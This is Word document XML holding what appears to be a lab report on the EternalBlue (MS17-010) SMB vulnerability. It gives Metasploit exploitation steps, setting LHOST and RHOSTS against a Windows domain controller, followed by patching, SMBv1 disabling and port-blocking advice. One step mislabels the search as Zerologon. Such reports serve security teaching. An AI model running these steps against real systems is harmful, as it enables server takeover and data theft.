    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2861BF4E" w14:textId="5768AF7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CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="1E0F4CF3" w14:textId="6B597D2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CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="1B3FB29C" w14:textId="4969DF9D">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This </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="36FAFF20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability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allows an attacker to gain </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00FAB549">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">full control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of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E820EF5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the server</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This poses serious threats to data protection and sensitive information </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77F4F973">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stored on the</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machine. It can also cause significant do</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wnti</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t</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b</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si</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s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sys</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tem</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s, disrupting productivity.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1ED4758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It also a</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lo</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s </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BAE04B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attackers</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od</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if</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the company's web pages and other key services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="23125F8A" w14:textId="27A1511B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="38611769" w14:textId="7568322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FCECC8F" w:rsidP="0D325B6E" w:rsidRDefault="4FCECC8F" w14:paraId="7B3DC509" w14:textId="157E20D2">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CECC8F">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Launch Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5D204148">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7677E957" w:rsidP="0D325B6E" w:rsidRDefault="7677E957" w14:paraId="18E367A5" w14:textId="6655DEC6">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677E957">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Search for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Zerologon</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 xml:space="preserve"> exploit – search </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="45317527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="387B7141" w:rsidP="0D325B6E" w:rsidRDefault="387B7141" w14:paraId="0DBD006D" w14:textId="6E0A5666">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87B7141">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5CA39601">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Load Exploit Module – use 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1C5AED12" w:rsidP="0D325B6E" w:rsidRDefault="1C5AED12" w14:paraId="7FA1F5E9" w14:textId="313C1530">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5AED12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0BD871CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set LHOST to the attack machine’s IP and set RHOSTS to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0BD871CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows Server/DC</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0BD871CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine that is being attacked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FB49DF" w:rsidP="0D325B6E" w:rsidRDefault="05FB49DF" w14:paraId="6EC74B1B" w14:textId="037DD030">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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5FB49DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="66DB8BBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run the exploit - run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="28776FCE" w14:textId="2A114E3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CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="29FAE782" w14:textId="36B47C8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43263B5" w:rsidP="0D325B6E" w:rsidRDefault="243263B5" w14:paraId="05F9D7CE" w14:textId="645D3129">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="243263B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1C35AD40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the following</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="372FDC45" w:rsidP="0D325B6E" w:rsidRDefault="372FDC45" w14:paraId="5541710A" w14:textId="442F764D">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72FDC45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apply</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the Microsoft security patc</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7AAAD632">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">h,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MS17-010</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="305684DF">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C8B3BEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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install</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2EC9918C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it</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on all </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09648BC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable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Windows systems </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1ED94D12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as soon as</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="233F374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33F3746">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">possible.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This patch</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F86E8AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires an update and restart to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FE85599">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>computer and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FE85599">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> therefore</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F86E8A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5809DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">may not be </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65809DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a viable</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65809DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> option if</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4F86E8A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F86E8AA">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4F86E8AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a critical system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="243263B5" w:rsidP="0D325B6E" w:rsidRDefault="243263B5" w14:paraId="462B5F44" w14:textId="269C7EC8">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SMBv1 </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1F33B2C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">should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be disabled on a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EAB6B39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffected machines</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as soon as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="476B780E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and upgraded to SMBv3</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T</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3ED4C20A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he</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protocol is deprecated and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contains</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known security weaknesses</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2F6717D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, including being the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E5C056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E5C0567">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">main cause of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E5C0567">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E5C0567">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="243263B5" w:rsidP="0D325B6E" w:rsidRDefault="243263B5" w14:paraId="2CC5181A" w14:textId="15B7CD1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Block inbound traffic for TCP ports 139 and 445 </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4B7234DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on both the host-based and network</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D999CB6">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ccess to these ports should be restricted between</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="663476B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
